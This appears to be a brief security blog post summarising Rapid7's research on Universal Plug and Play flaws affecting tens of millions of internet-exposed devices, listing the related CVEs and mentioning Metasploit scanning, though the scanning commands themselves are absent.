This morning, Rapid 7 released a whitepaper entitled Security Flaws in Universal Plug and Play. This paper is the result of a research project identifying over 80 million unique IPs that responded to UPnP discovery requests from the internet. Somewhere between 40 and 50 million IPs are vulnerable to at least one of three attacks outlined in this paper.
According to the security team at Rapid7, technology used worldwide in both routers and standard networking equipment is making it possible for hackers to potentially infiltrate approximately 40 million to 50 million devices worldwide.
The UPnP SOAP service provides access to device functions that should not be allowed from untrusted networks, including the ability to open holes through the firewall. Rapid7 estimates that approximately 17 million unique IPs expose the SOAP service to the public internet.
The vulnerability lies in the standard known as Universal Plug and Play (UPnP). This standard set of networking protocols allows devices, such as PCs, printers, and Wi-Fi access points, to communicate and discover each other’s presence. After discovery, devices can be connected through a network in order to share files, printing capability, and the Internet.
Over 25% of all exposed SSDP services are using this software (approximately 23 million systems). These issues have been assigned the following CVEs: CVE-2012-5958, CVE-2012-5959, CVE-2012-5960, CVE-2012-5961, CVE-2012-5962, CVE-2012-5963, CVE-2012-5964, CVE-2012-5965
Testing for the uPNP Vulnerabilities using Metasploit
To accomplish the same task using the command-line, first open the Metasploit console.
From the msf prompt, enter the following commands, substituting your own network for RHOSTS
Any devices supporting UPnP should appear, with specific CVEs listed for those that have at least one exploitable vulnerability.
I started out developing HTML in 1996, and have been involved in web development ever since. The majority of my work is now spent in the security field, but I also try to carve out time for dance music. I'm not as involved as I used to be, but I still like to produce music. Check me out on iTunes or Beatport.